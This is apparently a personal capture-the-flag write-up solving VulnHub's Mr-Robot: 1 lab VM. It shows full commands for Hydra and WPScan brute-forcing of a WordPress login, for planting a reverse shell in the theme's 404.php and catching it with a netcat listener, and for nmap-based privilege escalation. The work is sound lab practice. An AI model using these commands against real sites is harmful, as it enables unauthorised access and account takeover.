Hello world! Today I'll be detailing the steps I took to hack VulnHub's Mr-Robot: 1 VM, created by Leon Johnson. The VM has three keys hidden in different locations and my goal is to find all three.
I'll be using a Kali Linux VM to attack Mr-Robot: 1, which we will refer to as "target" throughout the write-up. Both machines are set up on Oracle VM VirtualBox and their networks are set to the
Host Only Network.
Let's start hacking!
First we will need to do a little reconnaissance, so let's start with figuring out our target's IP address.
With our IP,
192.168.56.104 perform a network scan and check the full range of IP's for our target address with the following command:
nmap -oX nmap_scan.xml 192.168.56.0/24
After a quick check of each IP on the nmap report, we see our target is on
There are tools like dirb that we can use to recon any potential subdirectories of the main host address, but this method was exhaustive and can take some time. To be efficient with our time, let's manually check some common subdirectories and see if we can get a lead:
...rude that it's not willing to help us with the hack.
...hmmm, doesn't look like we can get in. Noting the error message, it's prompted because of invalid username. So if we enter the correct username, would it prompt us with “Invalid password” instead? 👀
We'll circle back to the WP login later...
...and luckily enough, there's
key-1-of-3.txt, our 1st key! ✅
As we saw earlier, there is a WP site we can try logging into, but of course, can't login without the right username & password.
Using WPScan, we can try to find any valid users:
...but from the looks of it, nothing substantial, except maybe the WordPress version, which seems exploitable.
...that we can use for possible username and password combinations!
There are a few tools that we can use to brute force the WP login:
...and if we use
fsocity.dic as a wordlist for the cracking tool parameters, it's going to take a long while to brute force
858,160 potential username/password combos.
If we remove any duplicates and sort the wordlist, we could optimize the time it would take to brute force (TL;DR: shorter list, faster time to crack):
type fsocity.dic | sort | uniq > sorted_uniq_fsocity.txt
Looking at the length of each response, most are pretty consistent when erroring out, but scrolling not too far down to Elliot, we see the response is
4164 instead of the usual
4114. In the Rendered response, we see that the error message shows that the password entered for
Elliot is incorrect, which from our previous observation about error messages us to conclude that
Elliot is a valid user.
If we used the sorted list, it ideally would've shortened the brute force time execution. However, because it’s also sorted it could take longer to see the target response, especially if the right credential is last on the word list.
Considering how long it might take to use Burp Suite to brute force the password (since this is a Community version of Burp), we’ll move on with another tool, Hydra.
Using Hydra, we're able to brute force a valid login, when using the original
fsocity.dic and an arbitrary password
hydra -V -L ./fsocity.dic -p test 192.168.56.103 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.56.103%2Fwp-admin%2F&testcookie=1:Invalid username"
Again, it was fairly quick since the username
Elliot was right near the top. But if we were to used the sorted, unique version of fsocity.dic, it would've taken up to attempt
11,452 in order to get the username:
After username, now we can brute force the password with username
elliot, and here we'll use our duplicate-removed and sorted version of our wordlist
hydra -V -l elliot -P ./sorted_uniq_fsocity.dic 192.168.56.103 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.56.103%2Fwp-admin%2F&testcookie=1:incorrect"
Note, with WPScan, since we were unable to enumerate any valid users with our preliminary scan, we'll have to rely on the previously mentioned tools (Burp & Hydra) to find the username first.
Once found, we can then use WPScan as an alternative to brute force the password like so:
wpscan -t 10000 -U Elliot -P fsocity.dic --url http://192.168.56.103/
So of the three tools, Hydra was most ideal with its quick execution time with this particular machine config. If circumstances were different, maybe users were enumerated or we were using the full Burp Suite version, the other tools would've been better for the job.
Our next moves are going to see if we can run reverse shell from pentestmonkey by inserting it into the
404.php file of the WP site.
Will need to switch network back to
Bridge Adapter in order to download the reverse shell, and then switch back to
Host Only Adapter to reconnect with the target.
To download the reverse shell onto Kali machine:
Using NetCat, we set up a listener on port
4242 with command:
nc -lnvp 4242
Open new terminal:
curl -X POST http://192.168.56.103/404.php
# This will send a POST request to the 404.php page
Can also send a POST request on web browser →
http://22.214.171.124/flaskdjhflakjsdhf. This will trigger a 404 page, and therefore request will trigger the reverse shell.
Now we want to have interactive control over the target, so let's run
python -c "import pty; pty.spawn('/bin/bash')"
Now that we have our "shell in a shell", let's see what we can literally "find" the 2nd key, assuming it is in the same format as the 1st one:
find / -name "key-2-of-3.txt"
We navigate to our target directory
/home/robot. Once there, we do an
ls -l and confirm the 2nd key. Then we try to
cat it to double check, but looks like our current privileges don’t allow us to access said file.
cat it, it looks like an md5 hash, which was obviously not hinted at by the file name
So let’s see if we can decrypt it by sending it to our good friend the CrackStation.
Considering the context clues of the
password.raw-md5 file and its contents, we've just found the password to the robot user.
Thinking of next steps, logically it would make sense to escalate permissions either up or across to other users who have access to files that we don't have access to (aka escalated to
robot when we were
daemon@linux in the shell). We'll need to find any files with the SUID permission set that we can exploit.
We can run the following to do just that:
find / -perm /4000 -type f 2>/tmp/2
On GTFOBins it looks like
nmap is a Unix binary we can exploit to escalate our privileges. As detailed on the repo, we'll need to run the following commands to spawn an interactive system shell:
Overall, this was a fun challenge for my first exercise in cybersecurity. I was focused on exploring different approaches to find each key, so I can be more aware of my toolkit and future methodology. It was definitely not quick to finish the CTF, but I learned a lot in doing so.
Until the next time, happy hacking! ✌🏻